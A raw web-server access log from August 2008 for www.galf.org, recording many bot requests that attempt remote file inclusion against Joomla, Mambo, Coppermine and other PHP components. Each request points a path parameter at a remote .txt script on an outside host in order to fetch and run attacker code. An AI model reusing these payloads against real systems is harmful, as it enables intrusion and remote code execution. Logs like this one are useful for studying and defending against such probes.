210.245.226.25 - - [10/Aug/2008:18:46:11 -0700] "GET /logs/access_071210.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
210.245.226.25 - - [10/Aug/2008:18:46:12 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
210.245.226.25 - - [10/Aug/2008:18:46:12 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
210.245.226.25 - - [10/Aug/2008:18:46:13 -0700] "GET /logs/access_070827.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.19.51.194 - - [10/Aug/2008:18:46:31 -0700] "GET /logs/access_080310.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.230.197.245 - - [10/Aug/2008:18:46:47 -0700] "GET /logs/access_071014.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
89.111.172.23 - - [10/Aug/2008:18:47:47 -0700] "GET /logs/access_070806.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.172.23 - - [10/Aug/2008:18:47:47 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.245.226.25 - - [10/Aug/2008:18:48:01 -0700] "GET /logs/access_080204.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.111.172.23 - - [10/Aug/2008:18:48:08 -0700] "GET /logs/access_070917.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.230.197.245 - - [10/Aug/2008:18:48:23 -0700] "GET /logs/access_070806.log/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
66.230.197.245 - - [10/Aug/2008:18:48:24 -0700] "GET /modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
66.230.197.245 - - [10/Aug/2008:18:48:24 -0700] "GET /logs/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
89.111.172.23 - - [10/Aug/2008:18:48:49 -0700] "GET /logs/access_071210.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.172.23 - - [10/Aug/2008:18:48:49 -0700] "GET /logs/access_070827.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.191.59.190 - - [10/Aug/2008:18:49:39 -0700] "GET /logs/access_080609.log//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.191.59.190 - - [10/Aug/2008:18:49:39 -0700] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.191.59.190 - - [10/Aug/2008:18:49:39 -0700] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.5.163.212 - - [10/Aug/2008:18:50:24 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.galf.org"
195.5.163.212 - - [10/Aug/2008:18:50:24 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
194.79.75.195 - - [10/Aug/2008:18:50:25 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
194.79.75.195 - - [10/Aug/2008:18:50:25 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
89.111.176.106 - - [10/Aug/2008:18:50:48 -0700] "GET /logs/access_080609.log//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.106 - - [10/Aug/2008:18:50:49 -0700] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.106 - - [10/Aug/2008:18:50:49 -0700] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.90 - - [10/Aug/2008:18:50:52 -0700] "GET /logs/access_080609.log//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.90 - - [10/Aug/2008:18:50:53 -0700] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.90 - - [10/Aug/2008:18:50:53 -0700] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.191.59.190 - - [10/Aug/2008:18:50:53 -0700] "GET /logs/access_080317.log//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.85.102.100 - - [10/Aug/2008:18:51:14 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
70.85.102.100 - - [10/Aug/2008:18:51:14 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
89.111.179.10 - - [10/Aug/2008:18:51:19 -0700] "GET /logs/access_080609.log//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.179.10 - - [10/Aug/2008:18:51:19 -0700] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.179.10 - - [10/Aug/2008:18:51:20 -0700] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.106 - - [10/Aug/2008:18:51:20 -0700] "GET /logs/access_080317.log//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.90 - - [10/Aug/2008:18:51:22 -0700] "GET /logs/access_080317.log//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.133.244.61 - - [10/Aug/2008:18:51:36 -0700] "GET /logs/access_080128.log/components/com_joomlaboard/file_upload.php/components/com_joomlaboard/file_upload.php?sbp=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.133.244.61 - - [10/Aug/2008:18:51:37 -0700] "GET /components/com_joomlaboard/file_upload.php/components/com_joomlaboard/file_upload.php?sbp=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.133.244.61 - - [10/Aug/2008:18:51:37 -0700] "GET /logs/components/com_joomlaboard/file_upload.php/components/com_joomlaboard/file_upload.php?sbp=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.111.172.23 - - [10/Aug/2008:18:51:39 -0700] "GET /logs/access_071015.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.172.23 - - [10/Aug/2008:18:51:39 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.179.10 - - [10/Aug/2008:18:51:49 -0700] "GET /logs/access_080317.log//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.133.244.61 - - [10/Aug/2008:18:52:01 -0700] "GET /components/com_joomlaboard/file_upload.php/components/com_joomlaboard/file_upload.php?sbp=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.121.131.6 - - [10/Aug/2008:18:52:21 -0700] "GET /logs/access_080609.log//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.121.131.6 - - [10/Aug/2008:18:52:22 -0700] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.121.131.6 - - [10/Aug/2008:18:52:22 -0700] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.172.23 - - [10/Aug/2008:18:53:16 -0700] "GET /logs/access_071028.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.121.131.6 - - [10/Aug/2008:18:53:20 -0700] "GET /logs/access_080317.log//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.121.131.6 - - [10/Aug/2008:18:53:23 -0700] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.59.70.177 - - [10/Aug/2008:18:54:01 -0700] "GET /logs/access_080602.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gamesport.cz/cestiny_files/id00.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.59.70.177 - - [10/Aug/2008:18:54:01 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gamesport.cz/cestiny_files/id00.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.59.70.177 - - [10/Aug/2008:18:54:01 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gamesport.cz/cestiny_files/id00.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.169.0.50 - - [10/Aug/2008:18:54:03 -0700] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
62.169.0.50 - - [10/Aug/2008:18:54:03 -0700] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
208.80.193.31 - - [10/Aug/2008:18:54:08 -0700] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=63&ct=result HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; AAPT; .NET CLR 1.1.4322)" "www.galf.org"
194.79.75.195 - - [10/Aug/2008:18:54:57 -0700] "GET /logs/access_071008.log/tiny_includes/config.php?dir_ws=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
194.79.75.195 - - [10/Aug/2008:18:54:58 -0700] "GET /logs/tiny_includes/config.php?dir_ws=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
194.79.75.195 - - [10/Aug/2008:18:55:00 -0700] "GET /logs/access_080114.log/tiny_includes/config.php?dir_ws=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
64.59.70.177 - - [10/Aug/2008:18:55:21 -0700] "GET /logs/access_080204.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gamesport.cz/cestiny_files/id00.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.5.163.212 - - [10/Aug/2008:18:55:33 -0700] "GET /logs/access_080114.log//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.5.163.212 - - [10/Aug/2008:18:55:33 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.5.163.212 - - [10/Aug/2008:18:55:45 -0700] "GET /logs/access_071008.log//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.230.197.245 - - [10/Aug/2008:18:56:22 -0700] "GET /logs/access_071231.log/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
66.230.197.245 - - [10/Aug/2008:18:56:23 -0700] "GET /logs/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
67.19.51.194 - - [10/Aug/2008:18:56:56 -0700] "GET /logs/access_080310.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.5.163.212 - - [10/Aug/2008:18:57:47 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.galf.org"
195.5.163.212 - - [10/Aug/2008:18:57:48 -0700] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
194.79.75.195 - - [10/Aug/2008:18:57:52 -0700] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
194.79.75.195 - - [10/Aug/2008:18:57:52 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
210.245.226.25 - - [10/Aug/2008:18:58:27 -0700] "GET /logs/access_070806.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
210.245.226.25 - - [10/Aug/2008:18:58:28 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
210.245.226.25 - - [10/Aug/2008:18:58:28 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.253.223.90 - - [10/Aug/2008:18:58:31 -0700] "GET /logs/access_080609.log//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.253.223.90 - - [10/Aug/2008:18:58:31 -0700] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.253.223.90 - - [10/Aug/2008:18:58:32 -0700] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.245.226.25 - - [10/Aug/2008:18:58:48 -0700] "GET /logs/access_070917.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
70.85.102.100 - - [10/Aug/2008:18:58:49 -0700] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.galf.org"
70.85.102.100 - - [10/Aug/2008:18:58:49 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
70.85.102.100 - - [10/Aug/2008:18:58:51 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
70.85.102.100 - - [10/Aug/2008:18:58:52 -0700] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:18:59:24 -0700] "GET /logs/access_080519.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:18:59:24 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:18:59:24 -0700] "GET /logs/access_080519.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:18:59:25 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:18:59:25 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:18:59:25 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:18:59:41 -0700] "GET /logs/access_080519.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:18:59:41 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:18:59:41 -0700] "GET /logs/access_071015.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:18:59:41 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:18:59:42 -0700] "GET /?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.65" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:18:59:43 -0700] "GET /logs/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 9661 "-" "libwww-perl/5.65" "www.galf.org"
213.149.247.12 - - [10/Aug/2008:18:59:46 -0700] "GET /logs/access_080317.log//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.149.247.12 - - [10/Aug/2008:18:59:46 -0700] "GET //com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.149.247.12 - - [10/Aug/2008:18:59:46 -0700] "GET /logs//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
